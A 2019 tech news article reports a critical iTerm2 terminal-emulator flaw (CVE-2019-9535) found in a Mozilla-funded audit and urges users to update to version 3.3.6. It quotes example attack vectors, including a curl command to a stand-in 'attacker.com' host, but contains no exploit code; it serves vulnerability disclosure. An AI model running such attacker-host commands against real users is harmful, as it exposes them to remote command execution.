View all newsletters
Receive our newsletter - data, insights and analysis delivered to you
  1. Technology
  2. Cybersecurity
October 11, 2019updated 27 Jul 2022 9:00am

Critical iTerm 2 Bug Patched after Mozilla-Backed Audit

"We expect the community will find many more creative examples..."

By CBR Staff Writer

A security audit funded by the Mozilla Open Source Support Program (MOSS) has discovered a critical security bug in iTerm2: a popular open source alternative to Apple’s Terminal — which provides a command line interface to control the UNIX-based operating system sitting below macOS.

Mozilla, iTerm2’s developers and Radically Open Security, the not-for-profit security company contracted to probe iTerm2’s security, have urged users to update the software, which has now been patched. The issue had been sitting in the open (hopefully) unnoticed for approximately seven years, they said.

Read this: Software Patch Management: Tips, Tricks and Stern Warnings

iTerm2 is one of the most popular terminal emulators in the world, and frequently used by developers, Mozilla noted, saying: “MOSS selected iTerm2 for a security audit because it processes untrusted data and it is widely used, including by high-risk targets (like developers and system administrators).

(Apple’s Terminal is widely looked down upon for lacking various functions. iTerm, by contrast, is seen as hugely feature-rich for power UNIX users).

Mozilla’s Tom Ritter said: “An attacker who can produce output to the terminal can, in many cases, execute commands on the user’s computer.

“Example attack vectors for this would be connecting to an attacker-controlled SSH server or commands like curl http://attacker.com and tail -f /var/log/apache2/referer_log.”

He added drily: “We expect the community will find many more creative examples.

MOSS said: “Typically this vulnerability would require some degree of user interaction or trickery; but because it can be exploited via commands generally considered safe there is a high degree of concern about the potential impact.”

Content from our partners
Sherif Tawfik: The Middle East and Africa are ready to lead on the climate
What to look for in a modern ERP system
How tech leaders can keep energy costs down and meet efficiency goals

The vulnerability has been assigned CVE-2019-9535.

iTerm2’s team said they recommend a proactive immediate update by going to the iTerm2 menu and choosing Check for updates…

The fix is available in version 3.3.6.

Netherlands-based Radically Open Security is a not-for-profit computer security company legally established as a ‘Fiscaal Fondsenwervende Instelling’ (fiscal fundraising institution) in the Netherlands. This summer it donated 90 percent of its net profit to an internet charity, NLnet, that supports open source technology and open internet research and development.

Websites in our network
Select and enter your corporate email address Tech Monitor's research, insight and analysis examines the frontiers of digital transformation to help tech leaders navigate the future. Our Changelog newsletter delivers our best work to your inbox every week.
  • CIO
  • CTO
  • CISO
  • CSO
  • CFO
  • CDO
  • CEO
  • Architect Founder
  • MD
  • Director
  • Manager
  • Other
Visit our privacy policy for more information about our services, how New Statesman Media Group may use, process and share your personal data, including information on your rights in respect of your personal data and how you can unsubscribe from future marketing communications. Our services are intended for corporate subscribers and you warrant that the email address submitted is your corporate email address.
THANK YOU